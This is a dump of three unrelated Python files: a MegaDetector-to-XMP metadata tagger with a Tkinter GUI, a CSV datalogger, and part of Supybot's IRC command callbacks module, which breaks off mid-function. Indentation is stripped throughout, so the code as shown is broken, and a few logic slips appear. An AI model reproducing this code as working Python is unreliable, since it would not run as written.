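#     options.rename_cats = 'all'
#     options.num_threads = '4'
#     process_input_data(options)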
#%% Functions
def write_status(options,s):
if options.xmp_gui is None:
return
options.xmp_gui.textarea_status.configure(state="normal")
options.xmp_gui.textarea_status.insert(tkinter.END, s + '\n')
options.xmp_gui.textarea_status.configure(state="disabled")
n_images_processed = 0
def update_xmp_metadata(categories, options, rename_cats, n_images, image):
"""
Update the XMP metadata for a single image
"""
# Relative image path
filename = ''
# Absolute image path
img_path = ''
global n_images_processed
try:
filename = image['file']
if options.remove_path != None and len(options.remove_path) > 0:
filename = filename.replace(options.remove_path, '')
img_path = os.path.join(options.image_folder, filename)
assert os.path.isfile(img_path), 'Image {} not found'.format(img_path)
# List of categories to write to XMP metadata
image_categories = []
# Categories with above-threshold detections present for
# this image
original_image_cats = []
# Maximum confidence for each category
original_image_cats_conf = {}
for detection in image['detections']:
cat = category_mapping[categories[detection['category']]]
# Have we already added this to the list of categories to
# write out to this image?
if cat not in image_categories:
# If we're supposed to compare to a threshold...
# Check for None before calling len(), otherwise a missing
# threshold raises a TypeError
if options.min_threshold != None and \
   len(options.min_threshold) > 0:
if float(detection['conf']) > float(options.min_threshold):
image_categories.append(cat)
original_image_cats.append(
categories[detection['category']])
# Else we treat *any* detection as valid...
else:
image_categories.append(cat)
original_image_cats.append(categories[detection['category']])
# Keep track of the highest-confidence detection for this class
if options.min_threshold != None and \
len(options.min_threshold) > 0 and \
detection['conf'] > \
original_image_cats_conf.get(
categories[detection['category']], 0):
original_image_cats_conf[categories[detection['category']]] = \
detection['conf']
img = pyexiv2.Image(r'{0}'.format(img_path))
img.modify_xmp({'Xmp.lr.hierarchicalSubject': image_categories})
# If we're doing the rename/.check behavior...
if not (options.rename_conf is None and options.rename_cats is None):
matching_cats = set(rename_cats).intersection(set(original_image_cats))
is_conf_low = False
if options.min_threshold != None and len(options.min_threshold) > 0:
for matching_cat in matching_cats:
if original_image_cats_conf[matching_cat] < float(options.rename_conf):
is_conf_low = True
if options.min_threshold != None and \
len(options.min_threshold) > 0 and \
len(image['detections']) == 0 or \
(len(options.rename_conf) > 0 and \
is_conf_low is True and \
len(matching_cats) > 0):
parent_folder = os.path.dirname(img_path)
file_name = ntpath.basename(img_path)
manual_file_name = file_name.split('.')[0]+'_check' + '.' + file_name.split('.')[1]
os.rename(img_path, os.path.join(parent_folder, manual_file_name))
if options.xmp_gui is not None:
n_images_processed += 1
percentage = round((n_images_processed)/n_images*100)
options.xmp_gui.progress_bar['value'] = percentage
options.xmp_gui.root.update_idletasks()
options.xmp_gui.style.configure('text.Horizontal.Tprogress_bar',
text='{:g} %'.format(percentage))
except Exception as e:
s = 'Error processing image {}: {}'.format(filename,str(e))
print(s)
traceback.print_exc()
write_status(options,s)
if False:
# Legacy code to rename files where XMP writing failed
parent_folder = os.path.dirname(img_path)
file_name = ntpath.basename(img_path)
failed_file_name = file_name.split('.')[0]+'_failed' + '.' + file_name.split('.')[1]
os.rename(img_path, os.path.join(
parent_folder, failed_file_name))
def process_input_data(options):
"""
Main function to loop over images and modify XMP data
"""
if options.xmp_gui is not None:
if (options.image_folder is None) or (len(options.image_folder) == 0):
tkinter.messagebox.showerror(title='Error', message='Image folder is not selected')
sys.exit()
if (options.input_file is None) or (len(options.input_file) == 0):
tkinter.messagebox.showerror(
title='Error', message='No MegaDetector .json file selected')
sys.exit()
options.remove_path = options.xmp_gui.textarea_remove_path.get()
options.rename_conf = options.xmp_gui.textarea_rename_conf.get()
options.rename_cats = options.xmp_gui.textarea_rename_cats.get()
options.num_threads = options.xmp_gui.textarea_num_threads.get()
options.min_threshold = options.xmp_gui.textarea_min_threshold.get()
try:
with open(options.input_file, 'r') as f:
data = f.read()
data = json.loads(data)
categories = data['detection_categories']
images = data['images']
n_images = len(images)
if not (options.rename_conf is None and options.rename_cats is None):
rename_cats = options.rename_cats.split(",")
if rename_cats[0] == 'all':
rename_cats = list(category_mapping.keys())
else:
rename_cats = []
if options.num_threads is not None and len(str(options.num_threads)) > 0:
num_threads = int(options.num_threads)
else:
num_threads = 1
print('Using {} worker thread(s)'.format(num_threads))
if options.xmp_gui is None:
func = partial(update_xmp_metadata, categories, options, rename_cats, n_images)
with Pool(num_threads) as p:
with tqdm(total=n_images) as pbar:
for i, _ in enumerate(p.imap_unordered(func, images)):
pbar.update()
else:
func = partial(update_xmp_metadata, categories, options, rename_cats, n_images)
with ThreadPool(num_threads) as p:
p.map(func, images)
s = 'Successfully processed {} images'.format(n_images)
print(s)
write_status(options,s)
except Exception as e:
print('Error processing input data: {}'.format(str(e)))
traceback.print_exc()
if options.xmp_gui is not None:
tkinter.messagebox.showerror(title='Error',
message='Make sure you selected the proper image folder and .json file')
sys.exit()
def start_input_processing(options):
t = threading.Thread(target=lambda: process_input_data(options))
t.start()
def browse_folder(options,folder_path_var):
filename = tkinter.filedialog.askdirectory()
options.image_folder = r'{0}'.format(filename)
folder_path_var.set(filename)
def browse_file(options,file_path_var):
filename = tkinter.filedialog.askopenfilename()
options.input_file = r'{0}'.format(filename)
file_path_var.set(filename)
def create_gui(options):
root = tkinter.Tk()
root.resizable(False, False)
root.configure(background='white')
root.title('DigiKam Integration')
group = tkinter.LabelFrame(root, padx=5, pady=5)
group.configure(background = 'white')
group.pack(padx=10, pady=10, fill='both', expand='yes')
canvas = tkinter.Canvas(group, width = 800, height = 150)
canvas.configure(background = 'white')
canvas.pack()
img1 = tkinter.PhotoImage(file='images/aiforearth.png')
canvas.create_image(0,0, anchor=tkinter.NW, image=img1)
img2 = tkinter.PhotoImage(file='images/bg.png')
canvas.create_image(0,20, anchor=tkinter.NW, image=img2)
frame = tkinter.Frame(root)
frame.configure(background='white')
frame.pack()
l1 = tkinter.Label(frame, text='Folder containing images')
l1.configure(background='white')
l1.grid(row=0, column=0)
folder_path_var = tkinter.StringVar()
e1 = tkinter.Entry(frame, width=50, textvariable=folder_path_var, highlightthickness=1)
e1.configure(highlightbackground='grey', highlightcolor='grey')
e1.grid(row=0, column=2)
b1 = tkinter.Button(frame, text='Browse', fg='blue', command=lambda: browse_folder(options,folder_path_var))
b1.grid(row=0, column=5, padx=10)
l2 = tkinter.Label(frame, text='Path to MegaDetector output .json file')
l2.configure(background='white')
l2.grid(row=1, column=0)
file_path_var = tkinter.StringVar()
e2 = tkinter.Entry(frame, width=50, textvariable=file_path_var, highlightthickness=1)
e2.configure(highlightbackground='grey', highlightcolor='grey')
e2.grid(row=1, column=2)
b2 = tkinter.Button(frame, text='Browse', fg='blue', command=lambda: browse_file(options,file_path_var))
b2.grid(row=1, column=5, padx=10)
l6 = tkinter.Label(frame, text='Minimum confidence to consider a category')
l6.configure(background='white')
l6.grid(row=2, column=0)
textarea_min_threshold = tkinter.Entry(frame, width=50, highlightthickness=1)
textarea_min_threshold.configure(highlightbackground='grey', highlightcolor='grey')
textarea_min_threshold.grid(row=2, column=2)
l3 = tkinter.Label(frame, text='Prefix to remove from image paths (optional)')
l3.configure(background='white')
l3.grid(row=3, column=0)
textarea_remove_path = tkinter.Entry(frame, width=50, highlightthickness=1)
textarea_remove_path.configure(highlightbackground='grey', highlightcolor='grey')
textarea_remove_path.grid(row=3, column=2)
l4 = tkinter.Label(frame, text='Confidence level below which images are flagged for manual check (optional)')
l4.configure(background='white')
l4.grid(row=4, column=0)
textarea_rename_conf = tkinter.Entry(frame, width=50, highlightthickness=1)
textarea_rename_conf.configure(highlightbackground='grey', highlightcolor='grey')
textarea_rename_conf.grid(row=4, column=2)
l5 = tkinter.Label(frame, text='Categories to apply the confidence check to (optional)')
l5.configure(background='white')
l5.grid(row=5, column=0)
textarea_rename_cats = tkinter.Entry(frame, width=50, highlightthickness=1)
textarea_rename_cats.configure(highlightbackground='grey', highlightcolor='grey')
textarea_rename_cats.grid(row=5, column=2)
l6 = tkinter.Label(frame, text='Number of threads to run (optional)')
l6.configure(background='white')
l6.grid(row=6, column=0)
textarea_num_threads = tkinter.Entry(frame, width=50, highlightthickness=1)
textarea_num_threads.configure(highlightbackground='grey', highlightcolor='grey')
textarea_num_threads.grid(row=6, column=2)
sb = tkinter.Button(frame, text='Submit', fg='black',
command=lambda: start_input_processing(options), padx=10)
sb.grid(row=7, column=2, padx=10, pady=10)
style = tkinter.ttk.Style(root)
style.layout('text.Horizontal.TProgressbar',
[('Horizontal.Progressbar.trough',
{'children': [('Horizontal.Progressbar.pbar',
{'side': 'left', 'sticky': 'ns'})],
'sticky': 'nswe'}),
('Horizontal.Progressbar.label', {'sticky': ''})])
style.configure('text.Horizontal.TProgressbar', text='0 %')
progress_bar = tkinter.ttk.Progressbar(root, style='text.Horizontal.TProgressbar', length=700,
maximum=100, value=0, mode='determinate')
progress_bar.pack(pady=10)
group2 = tkinter.LabelFrame(root, text='Status', padx=5, pady=5)
group2.pack(padx=10, pady=10, fill='both', expand='yes')
textarea_status = tkinter.Text(group2, height=10, width=100)
textarea_status.configure(state="disabled")
textarea_status.pack()
options.xmp_gui = xmp_gui()
options.xmp_gui.root = root
options.xmp_gui.textarea_min_threshold = textarea_min_threshold
options.xmp_gui.textarea_remove_path = textarea_remove_path
options.xmp_gui.textarea_rename_conf = textarea_rename_conf
options.xmp_gui.textarea_rename_cats = textarea_rename_cats
options.xmp_gui.textarea_num_threads = textarea_num_threads
options.xmp_gui.textarea_status = textarea_status
options.xmp_gui.progress_bar = progress_bar
options.xmp_gui.style = style
root.mainloop()
#%% Interactive/test driver
if False:
#%%
options = xmp_integration_options()
options.input_file = r"C:\temp\demo_images\ssmini_xmp_test_orig\ssmini.mdv4.json"
options.image_folder = r"C:\temp\demo_images\ssmini_xmp_test"
options.remove_path = 'my_images/'
process_input_data(options)
#%% Command-line driver
def args_to_object(args,obj):
"""
Copy all fields from the argparse table "args" to the object "obj"
"""
for n, v in inspect.getmembers(args):
if not n.startswith('_'):
setattr(obj, n, v)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--input_file', help = 'Path to the MegaDetector .json file', default=None)
parser.add_argument('--image_folder', help = 'Path to the folder containing images', default=None)
parser.add_argument('--min_threshold', help = 'Minimum detection confidence that will be treated as a detection event', default=None)
parser.add_argument('--remove_path', help = 'Prefix to remove from image paths in the .json file', default=None)
parser.add_argument('--rename_conf', help = 'Below this confidence level, images will be renamed for manual check', default=None)
parser.add_argument('--rename_cat', help = 'Category (or comma-delimited categories) to apply renaming behavior to', default=None)
parser.add_argument('--num_threads', help = 'Number of threads to use for image processing', default=1)
parser.add_argument('--gui', help = 'Run in GUI mode', action='store_true')
options = xmp_integration_options()
args = parser.parse_args()
args_to_object(args,options)
if options.gui:
assert options.input_file is None, 'Command-line argument specified in GUI mode'
assert options.image_folder is None, 'Command-line argument specified in GUI mode'
assert options.min_threshold is None, 'Command-line argument specified in GUI mode'
assert options.remove_path is None, 'Command-line argument specified in GUI mode'
assert options.rename_conf is None, 'Command-line argument specified in GUI mode'
assert options.rename_cat is None, 'Command-line argument specified in GUI mode'
assert options.num_threads == 1, 'Command-line argument specified in GUI mode'
create_gui(options)
else:
process_input_data(options)
if __name__ == '__main__':
main()
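#%% Example invocation
# A hedged, illustrative sketch of running this script from the command line;
# the paths and threshold values below are made up for illustration and are not
# taken from the original repository:
#
#   python xmp_integration.py \
#       --input_file /data/megadetector_output.json \
#       --image_folder /data/camera_trap_images \
#       --min_threshold 0.8 \
#       --rename_conf 0.9 \
#       --rename_cat all \
#       --num_threads 4
#
# Omit all arguments except --gui to launch the Tkinter interface instead.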
|
datalogger.py
|
'''
Created on Oct 6, 2018
@author: Vinu Karthek
'''
import os, datetime, threading
from classes import tkinter_app
import logging
try:
import tkinter as tk # Python 3.x
import tkinter.scrolledtext as ScrolledText
except ImportError:
import Tkinter as tk # Python 2.x
import ScrolledText
class datalogger():
'''
Generic Datalogger Class
'''
def __init__(self, datalog_path):
#Initialize the class with Datalog file path
self.max_file_size = 0
#Check if datalog path is a file or a directory
if not os.path.isdir(datalog_path):
self.datalog_filepath = datalog_path #If datalog_path is a file, assign it to the datalog_filepath variable
self.datalog_dir = os.path.split(self.datalog_filepath)[0] #Extract the datalog directory from the datalog filepath
self.check_if_folder_exists(self.datalog_dir) #Create the datalog directory if it doesn't exist
else:
self.datalog_dir = datalog_path
self.check_if_folder_exists(self.datalog_dir) #Create the datalog directory if it doesn't exist
self.datalog_filepath = os.path.join(self.datalog_dir,('log_'+self.get_time()+".csv"))
print(self.get_time())
self.init()
return
def check_if_folder_exists(self,folder_path):
if not os.path.exists(folder_path):
os.makedirs(folder_path)
return
def get_file_size(self):
#Get Datalog File size in Bytes
return os.path.getsize(self.datalog_filepath)
def get_time(self):
#Returns a timestamp in MM-DD-YYYY-HH.MM.SS format
now = datetime.datetime.now()
return str(now.strftime("%m-%d-%Y-%H.%M.%S"))
def get_log(self, length):
#Returns the last N lines from the datalog, where N is specified by variable 'length'
self.open()
self.datalog_fileref.seek(0)
lines = self.datalog_fileref.readlines()
self.close()
return lines[-length:]
def set_log(self, category, sub_category, log_string):
#Logs the incoming entries (Category, Subcategory, String) with a timestamp
#Category = self.class_name = self.__class__.__name__
#Subcategory = inspect.getframeinfo(inspect.currentframe()).function
timestamp = self.get_time()
line = category + ',' + sub_category + ',' + log_string + "," + timestamp +'\n'
self.open()
self.datalog_fileref.writelines(line)
self.close()
logging.info(line)
return
def log_execution_time(self):
#Returns the execution time on the module for logging
return
def worker(self):
self.worker_root = tk.Tk()
myGUI(self.worker_root)
self.worker_root.mainloop()
return
def destroy_debugconsole(self):
self.worker_root.destroy()
def init(self):
#Write a CSV header if the datalog file doesn't exist yet or is empty
if (not os.path.exists(self.datalog_filepath)) or (os.stat(self.datalog_filepath).st_size == 0):
line = 'category' + ',' + 'sub_category' + ',' + 'log_string' + "," + 'timestamp' +'\n'
self.open()
self.datalog_fileref.writelines(line)
self.close()
threading.Thread(target=self.worker, args=[]).start()
return
def open(self):
self.datalog_fileref = open(self.datalog_filepath,'a+')
return
def close(self):
self.datalog_fileref.close()
return
def show_logger(self):
#Separate thread to display & use queue to refresh datalog
logger_gui = tkinter_app.tkinter_app()
window_title = 'Datalogger'
threading.Thread(target=logger_gui.progressbar_app, args=(window_title,)).start()
return
class TextHandler(logging.Handler):
# This class allows you to log to a Tkinter Text or ScrolledText widget
# Adapted from Moshe Kaplan: https://gist.github.com/moshekaplan/c425f861de7bbf28ef06
def __init__(self, text):
# run the regular Handler __init__
logging.Handler.__init__(self)
# Store a reference to the Text it will log to
self.text = text
def emit(self, record):
msg = self.format(record)
def append():
self.text.configure(state='normal')
self.text.insert(tk.END, msg + '\n')
self.text.configure(state='disabled')
# Autoscroll to the bottom
self.text.yview(tk.END)
# This is necessary because we can't modify the Text from other threads
self.text.after(0, append)
class myGUI(tk.Frame):
# This class defines the graphical user interface
def __init__(self, parent, *args, **kwargs):
tk.Frame.__init__(self, parent, *args, **kwargs)
self.root = parent
self.build_gui()
def build_gui(self):
# Build GUI
self.root.title('TEST')
self.root.option_add('*tearOff', 'FALSE')
self.grid(column=0, row=0, sticky='ew')
self.grid_columnconfigure(0, weight=1, uniform='a')
self.grid_columnconfigure(1, weight=1, uniform='a')
self.grid_columnconfigure(2, weight=1, uniform='a')
self.grid_columnconfigure(3, weight=1, uniform='a')
#self.grid_columnconfigure(4, weight=1, uniform='a')
#self.grid_columnconfigure(5, weight=1, uniform='a')
# Add text widget to display logging info
st = ScrolledText.ScrolledText(self, state='disabled', width=110)
st.configure(font='TkFixedFont')
st.grid(column=0, row=1, sticky='w', columnspan=4)
# Create textLogger
text_handler = TextHandler(st)
# Logging configuration
logging.basicConfig(filename='test.log',
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s')
# Add the handler to logger
logger = logging.getLogger()
logger.addHandler(text_handler)
# from classes import datalogger
# import json_api
#
#
# json_filename = r"D:\Python\Tensorflow\Neural_Networks\Image Classifier\Generic_Classifier\main.json"
# json_obj = json_api.read_json(json_filename)
# datalogger_obj = datalogger.datalogger(json_obj['datalog_dir'])
# print(datalogger_obj.datalog_filepath)
# print(datalogger_obj.datalog_dir)
# datalogger_obj.set_log('category', 'sub_category', 'log_string')
# print("File size : "+ str(datalogger_obj.get_file_size())+' bytes')
# print(datalogger_obj.get_log(3))
|
callbacks.py
|
# -*- coding: utf8 -*-
###
# Copyright (c) 2002-2005, Jeremiah Fincher
# Copyright (c) 2014, James McCoy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
"""
This module contains the basic callbacks for handling PRIVMSGs.
"""
import re
import copy
import time
from . import shlex
import codecs
import getopt
import inspect
import warnings
from . import (conf, ircdb, irclib, ircmsgs, ircutils, log, registry,
utils, world)
from .utils import minisix
from .utils.iter import any, all
from .i18n import PluginInternationalization
_ = PluginInternationalization()
def _addressed(irc, msg, prefixChars=None, nicks=None,
prefixStrings=None, whenAddressedByNick=None,
whenAddressedByNickAtEnd=None, payload=None):
"""Determines whether this message is a command to the bot (because of a
prefix char/string, or because the bot's nick is used as prefix, or because
it's a private message, etc.).
Returns the actual content of the command (ie. the content of the message,
stripped of the prefix that was used to determine if it's addressed).
If 'payload' is not None, its value is used instead of msg.args[1] as the
content of the message."""
if isinstance(irc, str):
warnings.warn(
"callbacks.addressed's first argument should now be be the Irc "
"object instead of the bot's nick.",
DeprecationWarning)
network = None
nick = irc
else:
network = irc.network
nick = irc.nick
def get(group):
v = group.getSpecific(network=network, channel=msg.channel)
return v()
def stripPrefixStrings(payload):
for prefixString in prefixStrings:
if payload.startswith(prefixString):
payload = payload[len(prefixString):].lstrip()
return payload
assert msg.command in ('PRIVMSG', 'TAGMSG')
target = msg.channel or msg.args[0]
if not payload:
payload = msg.args[1]
if not payload:
return ''
if prefixChars is None:
prefixChars = get(conf.supybot.reply.whenAddressedBy.chars)
if whenAddressedByNick is None:
whenAddressedByNick = get(conf.supybot.reply.whenAddressedBy.nick)
if whenAddressedByNickAtEnd is None:
r = conf.supybot.reply.whenAddressedBy.nick.atEnd
whenAddressedByNickAtEnd = get(r)
if prefixStrings is None:
prefixStrings = get(conf.supybot.reply.whenAddressedBy.strings)
# We have to check this before nicks -- try "@google supybot" with supybot
# and whenAddressedBy.nick.atEnd on to see why.
if any(payload.startswith, prefixStrings):
return stripPrefixStrings(payload)
elif payload[0] in prefixChars:
return payload[1:].strip()
if nicks is None:
nicks = get(conf.supybot.reply.whenAddressedBy.nicks)
nicks = list(map(ircutils.toLower, nicks))
else:
nicks = list(nicks) # Just in case.
nicks.insert(0, ircutils.toLower(nick))
# Ok, let's see if it's a private message.
if ircutils.nickEqual(target, nick):
payload = stripPrefixStrings(payload)
while payload and payload[0] in prefixChars:
payload = payload[1:].lstrip()
return payload
# Ok, not private. Does it start with our nick?
elif whenAddressedByNick:
for nick in nicks:
lowered = ircutils.toLower(payload)
if lowered.startswith(nick):
try:
(maybeNick, rest) = payload.split(None, 1)
toContinue = False
while not ircutils.isNick(maybeNick, strictRfc=True):
if maybeNick[-1].isalnum():
toContinue = True
break
maybeNick = maybeNick[:-1]
if toContinue:
continue
if ircutils.nickEqual(maybeNick, nick):
return rest
else:
continue
except ValueError: # split didn't work.
continue
elif whenAddressedByNickAtEnd and lowered.endswith(nick):
rest = payload[:-len(nick)]
possiblePayload = rest.rstrip(' \t,;')
if possiblePayload != rest:
# There should be some separator between the nick and the
# previous alphanumeric character.
return possiblePayload
if get(conf.supybot.reply.whenNotAddressed):
return payload
else:
return ''
def addressed(irc, msg, **kwargs):
"""If msg is addressed to 'name', returns the portion after the address.
Otherwise returns the empty string.
"""
payload = msg.addressed
if payload is not None:
return payload
else:
payload = _addressed(irc, msg, **kwargs)
msg.tag('addressed', payload)
return payload
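# Illustrative examples (not part of the original module) of what the helpers
# above typically return, assuming the bot's nick is 'mybot' and the configured
# prefix characters include '@':
#   '@echo hi'        -> 'echo hi'   (prefix char stripped)
#   'mybot: echo hi'  -> 'echo hi'   (nick prefix stripped)
#   'just chatting'   -> ''          (not addressed to the bot)
# Private messages are treated as addressed, so their full payload is returned.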
def canonicalName(command, preserve_spaces=False):
"""Turn a command into its canonical form.
Currently, this makes everything lowercase and removes all dashes and
underscores.
"""
if minisix.PY2 and isinstance(command, unicode):
command = command.encode('utf-8')
elif minisix.PY3 and isinstance(command, bytes):
command = command.decode()
special = '\t-_'
if not preserve_spaces:
special += ' '
reAppend = ''
while command and command[-1] in special:
reAppend = command[-1] + reAppend
command = command[:-1]
return ''.join([x for x in command if x not in special]).lower() + reAppend
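# For illustration (these examples are not in the original source):
#   canonicalName('Google')     -> 'google'
#   canonicalName('list-URLs')  -> 'listurls'  (dashes/underscores removed)
#   canonicalName('import_')    -> 'import_'   (trailing special characters are
#                                               re-appended, so command names can
#                                               avoid clashing with Python keywords)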
def reply(*args, **kwargs):
warnings.warn('callbacks.reply is deprecated. Use irc.reply instead.',
DeprecationWarning)
return _makeReply(dynamic.irc, *args, **kwargs)
def _makeReply(irc, msg, s,
prefixNick=None, private=None,
notice=None, to=None, action=None, error=False,
stripCtcp=True):
msg.tag('repliedTo')
# Ok, let's make the target:
# XXX This isn't entirely right. Consider to=#foo, private=True.
target = ircutils.replyTo(msg)
def isPublic(s):
return irc.isChannel(irc.stripChannelPrefix(s))
if to is not None and isPublic(to):
target = to
if isPublic(target):
channel = irc.stripChannelPrefix(target)
else:
channel = None
if notice is None:
notice = conf.get(conf.supybot.reply.withNotice,
channel=channel, network=irc.network)
if private is None:
private = conf.get(conf.supybot.reply.inPrivate,
channel=channel, network=irc.network)
if prefixNick is None:
prefixNick = conf.get(conf.supybot.reply.withNickPrefix,
channel=channel, network=irc.network)
if error:
notice = conf.get(conf.supybot.reply.error.withNotice,
channel=channel, network=irc.network) or notice
private = conf.get(conf.supybot.reply.error.inPrivate,
channel=channel, network=irc.network) or private
s = _('Error: ') + s
if private:
prefixNick = False
if to is None:
target = msg.nick
else:
target = to
if action:
prefixNick = False
if to is None:
to = msg.nick
if stripCtcp:
s = s.strip('\x01')
# Ok, now let's make the payload:
s = ircutils.safeArgument(s)
if not s and not action:
s = _('Error: I tried to send you an empty message.')
if prefixNick and isPublic(target):
# Let's make sure we don't do, "#channel: foo.".
if not isPublic(to):
s = '%s: %s' % (to, s)
if not isPublic(target):
if conf.supybot.reply.withNoticeWhenPrivate():
notice = True
# And now, let's decide whether it's a PRIVMSG or a NOTICE.
msgmaker = ircmsgs.privmsg
if notice:
msgmaker = ircmsgs.notice
# We don't use elif here because actions can't be sent as NOTICEs.
if action:
msgmaker = ircmsgs.action
# Finally, we'll return the actual message.
ret = msgmaker(target, s)
ret.tag('inReplyTo', msg)
if 'msgid' in msg.server_tags \
and conf.supybot.protocols.irc.experimentalExtensions() \
and 'message-tags' in irc.state.capabilities_ack:
# In theory, msgid being in server_tags implies message-tags was
# negotiated, but the +reply spec requires it explicitly. Plus, there's
# no harm in doing this extra check, in case a plugin is replying
# across network (as it may happen with '@network command').
ret.server_tags['+draft/reply'] = msg.server_tags['msgid']
return ret
def error(*args, **kwargs):
warnings.warn('callbacks.error is deprecated. Use irc.error instead.',
DeprecationWarning)
return _makeErrorReply(dynamic.irc, *args, **kwargs)
def _makeErrorReply(irc, msg, s, **kwargs):
"""Makes an error reply to msg with the appropriate error payload."""
kwargs['error'] = True
msg.tag('isError')
return _makeReply(irc, msg, s, **kwargs)
def getHelp(method, name=None, doc=None):
if name is None:
name = method.__name__
if doc is None:
if method.__doc__ is None:
doclines = ['This command has no help. Complain to the author.']
else:
doclines = method.__doc__.splitlines()
else:
doclines = doc.splitlines()
s = '%s %s' % (name, doclines.pop(0))
if doclines:
help = ' '.join(doclines)
s = '(%s) -- %s' % (ircutils.bold(s), help)
return utils.str.normalizeWhitespace(s)
def getSyntax(method, name=None, doc=None):
if name is None:
name = method.__name__
if doc is None:
doclines = method.__doc__.splitlines()
else:
doclines = doc.splitlines()
return '%s %s' % (name, doclines[0])
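# Illustrative sketch (not from the original source) of how a command's
# docstring maps to help text. For a hypothetical plugin method
#
#     def echo(self, irc, msg, args, text):
#         """<text>
#
#         Returns <text> unchanged."""
#
# getHelp(echo) yields roughly '(echo <text>) -- Returns <text> unchanged.'
# (with the name/syntax part bolded on IRC), while getSyntax(echo) yields
# just 'echo <text>'.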
class Error(Exception):
"""Generic class for errors in Privmsg callbacks."""
pass
class ArgumentError(Error):
"""The bot replies with a help message when this is raised."""
pass
class SilentError(Error):
"""An error that we should not notify the user."""
pass
class Tokenizer(object):
# This will be used as a global environment to evaluate strings in.
# Evaluation is, of course, necessary in order to allow escaped
# characters to be properly handled.
#
# These are the characters valid in a token. Everything printable except
# double-quote, left-bracket, and right-bracket.
separators = '\x00\r\n \t'
def __init__(self, brackets='', pipe=False, quotes='"'):
if brackets:
self.separators += brackets
self.left = brackets[0]
self.right = brackets[1]
else:
self.left = ''
self.right = ''
self.pipe = pipe
if self.pipe:
self.separators += '|'
self.quotes = quotes
self.separators += quotes
def _handleToken(self, token):
if token[0] == token[-1] and token[0] in self.quotes:
token = token[1:-1]
# FIXME: No need to tell you this is a hack.
# It has to handle both IRC commands and serialized configuration.
#
# Whoever you are, if you make a single modification to this
# code, TEST the code with Python 2 & 3, both with the unit
# tests and on IRC with this: @echo "好"
if minisix.PY2:
try:
token = token.encode('utf8').decode('string_escape')
token = token.decode('utf8')
except:
token = token.decode('string_escape')
else:
token = codecs.getencoder('utf8')(token)[0]
token = codecs.getdecoder('unicode_escape')(token)[0]
try:
token = token.encode('iso-8859-1').decode()
except: # Prevent issue with tokens like '"\\x80"'.
pass
return token
def _insideBrackets(self, lexer):
ret = []
while True:
token = lexer.get_token()
if not token:
raise SyntaxError(_('Missing "%s". You may want to '
'quote your arguments with double '
'quotes in order to prevent extra '
'brackets from being evaluated '
'as nested commands.') % self.right)
elif token == self.right:
return ret
elif token == self.left:
ret.append(self._insideBrackets(lexer))
else:
ret.append(self._handleToken(token))
return ret
def tokenize(self, s):
lexer = shlex.shlex(minisix.io.StringIO(s))
lexer.commenters = ''
lexer.quotes = self.quotes
lexer.separators = self.separators
args = []
ends = []
while True:
token = lexer.get_token()
if not token:
break
elif token == '|' and self.pipe:
# The "and self.pipe" might seem redundant here, but it's there
# for strings like 'foo | bar', where a pipe stands alone as a
# token, but shouldn't be treated specially.
if not args:
raise SyntaxError(_('"|" with nothing preceding. I '
'obviously can\'t do a pipe with '
'nothing before the |.'))
ends.append(args)
args = []
elif token == self.left:
args.append(self._insideBrackets(lexer))
elif token == self.right:
raise SyntaxError(_('Spurious "%s". You may want to '
'quote your arguments with double '
'quotes in order to prevent extra '
'brackets from being evaluated '
'as nested commands.') % self.right)
else:
args.append(self._handleToken(token))
if ends:
if not args:
raise SyntaxError(_('"|" with nothing following. I '
'obviously can\'t do a pipe with '
'nothing after the |.'))
args.append(ends.pop())
while ends:
args[-1].append(ends.pop())
return args
def tokenize(s, channel=None, network=None):
"""A utility function to create a Tokenizer and tokenize a string."""
pipe = False
brackets = ''
nested = conf.supybot.commands.nested
if nested():
brackets = nested.brackets.getSpecific(network, channel)()
if conf.get(nested.pipeSyntax,
channel=channel, network=network): # No nesting, no pipe.
pipe = True
quotes = conf.supybot.commands.quotes.getSpecific(network, channel)()
try:
ret = Tokenizer(brackets=brackets,pipe=pipe,quotes=quotes).tokenize(s)
return ret
except ValueError as e:
raise SyntaxError(str(e))
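# Illustrative only (not part of the original module): with the default
# configuration (square-bracket nesting enabled, double quotes), tokenize
# typically behaves like:
#   tokenize('echo foo bar')     -> ['echo', 'foo', 'bar']
#   tokenize('echo [time] done') -> ['echo', ['time'], 'done']   (nested command)
#   tokenize('echo "foo bar"')   -> ['echo', 'foo bar']          (quoted token)
# Pipe syntax, when enabled, turns 'foo | bar' into a nested structure so the
# output of 'foo' is fed as the last argument of 'bar'.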
def formatCommand(command):
return ' '.join(command)
def checkCommandCapability(msg, cb, commandName):
plugin = cb.name().lower()
if not isinstance(commandName, minisix.string_types):
assert commandName[0] == plugin, ('checkCommandCapability no longer '
'accepts command names that do not start with the callback\'s '
'name (%s): %s') % (plugin, commandName)
commandName = '.'.join(commandName)
def checkCapability(capability):
assert ircdb.isAntiCapability(capability)
if ircdb.checkCapability(msg.prefix, capability):
log.info('Preventing %s from calling %s because of %s.',
msg.prefix, commandName, capability)
raise RuntimeError(capability)
try:
antiCommand = ircdb.makeAntiCapability(commandName)
checkCapability(antiCommand)
